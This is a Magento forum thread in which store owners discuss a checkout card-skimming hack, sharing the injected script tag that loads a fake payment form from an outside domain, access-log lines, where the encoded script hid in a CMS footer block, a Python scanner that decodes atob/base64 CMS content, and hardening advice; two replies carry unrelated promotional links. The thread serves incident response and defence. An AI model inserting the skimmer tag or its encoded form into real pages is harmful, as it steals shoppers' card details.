Magento 2 Website Hacked

Hi,

Our Magento website was hacked recently.

Magento version: 2.4.5

The CC Avenue seamless module was installed at the checkout.

The hacker added a new custom form on top of it, and some of the customers suffered losses due to it as well.

At the checkout page, the script below was loading:

<script src="https://rdwebpolicyupdate.com/forms/payment-form.js"></script>

We talked with the hosting provider and they told us:

"This is not malware but a DDoS attack."

I found the following in the Apache access log:

202.76.162.160 - - [24/Jun/2025:18:51:42 +0000] "GET /stores/store/redirect/store/default/from_store/ar/uenc/aHR0cHM6Ly9hbXJpLmFlL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9jb2xvcj04NiZxPXBsZWF0ZWQrZW1iZWxsaXNoZWQrc2xlZXZlZCtiZWx0K2RyZXNzJl9fX3N0b3JlPWRlZmF1bHQ%2C/ HTTP/1.1" 302 1115 "-" "Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0"
202.76.165.32 - - [24/Jun/2025:18:51:43 +0000] "GET /stores/store/switch/?from_store=ar&store=default&data=aNhfQdHlcWVhQMrZwX7WkHa3sUAimqNp&signature=649fa675e4debb2d9e7c6f6bd6abdda35462ed878715a58c05ee86577b65f303&time_stamp=1750791102&uenc=aHR0cHM6Ly9hbXJpLmFlL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9jb2xvcj04NiZxPXBsZWF0ZWQrZW1iZWxsaXNoZWQrc2xlZXZlZCtiZWx0K2RyZXNzJl9fX3N0b3JlPWRlZmF1bHQ%2C HTTP/1.1" 302 1217 "-" "Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0"

I have reset the passwords of all administrator accounts, blocked the above IP range (which belongs to Singapore), and enabled the Malware Protection Service from the hosting team (Cloudways is the hosting provider).

I would like to know how it was possible for the attacker to add a custom form on top of the CC Avenue card form, and what additional steps we need to take to make sure it is not repeated in future.

Can you please give your view?

Re: Magento 2 Website Hacked

Is it true?

Re: Magento 2 Website Hacked

We recently faced a similar breach on a Magento 2.4.5 site where an attacker injected a malicious script:

<script src="https://rdwebpolicyupdate.com/forms/payment-form.js"></script>

This was loaded directly on the checkout page, hijacking the CC Avenue seamless payment form with a fake overlay. After investigation, we found:

  • The script wasn't due to a DDoS but a compromised file or admin access.

  • Logs showed suspicious redirects and user-agent spoofing.

  • IPs traced back to Singapore ranges.

We’ve since:

  • Reset all admin passwords

  • Blocked suspicious IP ranges

  • Enabled Cloudways Malware Protection

Still, the key question remains: How did the attacker modify core frontend files without triggering file integrity checks? Likely vectors include a vulnerable 3rd-party extension or leftover write permissions.

We’re now scanning for JS injection patterns on all project deployments — even outside Magento. For reference, we handled a similar content-level injection issue on a non-Magento app here:
👉 https://inatboxsapkindir.com.tr/

Would appreciate any insights from others on locking down JS-level form injections in Magento 2 environments.

Re: Magento 2 Website Hacked

Yes, the same script was added in our case as well.

I managed to find the location of the script.

It was in the CMS footer block, in encoded format.

I searched for the keywords "atob" and "base64" in the database and found it.

Re: Magento 2 Website Hacked

The malicious script was added in a CMS static block or a CMS page. To find it, run a full-text search in the DB for the <script> tag. Edit that block and remove the script.

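As an added example (not code posted by anyone in this thread), the following Python scan automates the check the two replies above describe: pull the content of every CMS block and page, search it for <script> tags and for atob/base64-encoded payloads, decode those payloads, and flag any script source outside an allowlist of known hosts. The allowed-host set, the sample rows and the row-loading SQL are assumptions; the external host in the sample is the one quoted in the thread.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts this store legitimately loads script from (assumption: your own domain and your gateway's).
ALLOWED_SCRIPT_HOSTS = {"example-store.test"}

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

def decode_b64_literals(content):
    """Decode every base64-looking string literal (including atob() arguments)."""
    decoded = []
    for blob in sorted(set(ATOB_RE.findall(content)) | set(B64_LITERAL_RE.findall(content))):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # looked like base64 but is not
            continue
    return decoded

def scan_content(identifier, content):
    """Return (identifier, layer, detail) findings for one cms_block/cms_page row."""
    findings = []
    layers = [("raw", content)] + [("base64", d) for d in decode_b64_literals(content)]
    for layer, text in layers:  # check the raw HTML, then each decoded payload
        for src in SCRIPT_SRC_RE.findall(text):
            host = urlparse(src).hostname
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                findings.append((identifier, layer, host))
    if "atob(" in content or "document.write(" in content:
        findings.append((identifier, "obfuscation", "atob()/document.write() in CMS content"))
    return findings

def scan_rows(rows):
    """rows: (identifier, content) pairs, e.g. the result of
    SELECT identifier, content FROM cms_block UNION ALL SELECT identifier, content FROM cms_page"""
    return [f for identifier, content in rows for f in scan_content(identifier, content)]

# Constructed sample rows; the external host is the one reported in this thread.
INJECTED_TAG = '<script src="https://rdwebpolicyupdate.com/forms/payment-form.js"></script>'
SAMPLE_ROWS = [
    ("footer_links", '<p>Contact us</p><script src="https://example-store.test/js/footer.js"></script>'),
    ("footer_injected", "<p>Contact us</p><script>document.write(atob('%s'))</script>"
     % base64.b64encode(INJECTED_TAG.encode()).decode()),
    ("promo_banner", "<div>Sale</div>" + INJECTED_TAG),
]

if __name__ == "__main__":
    print(scan_rows(SAMPLE_ROWS))
```

Any "base64" or "obfuscation" finding on a block that should contain only static HTML is the footer-block case described above; a "raw" finding for an unknown host is the plain injected tag.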

Re: Magento 2 Website Hacked

That’s a tough situation — sorry you had to go through it. From what you described, it sounds like the attacker was able to inject a malicious JavaScript file into your checkout page. This usually happens through:

  • A compromised admin account (even briefly)

  • Vulnerabilities in third-party modules or themes

  • Weak file permissions on the server, allowing unauthorized edits

  • Outdated extensions that can be exploited

Resetting admin passwords and blocking suspicious IPs are great first steps. Beyond that, here are a few additional recommendations:

  • Audit all third-party modules and remove any that aren't necessary

  • Use Magento's built-in Content Security Policy (CSP) to block unexpected external scripts

  • Regularly scan your filesystem for unauthorized changes

  • Keep your Magento core and all extensions up to date

  • Consider using a Web Application Firewall (WAF) for real-time protection

Sometimes it also helps to get a professional security audit, especially after an incident like this.

On a different note, for anyone dealing with vehicle upgrades locally, car tint san jose ca services are quite popular to protect interiors and reduce sun damage — which is another kind of preventive protection, in a way!

Hope this helps, and best of luck securing your site moving forward!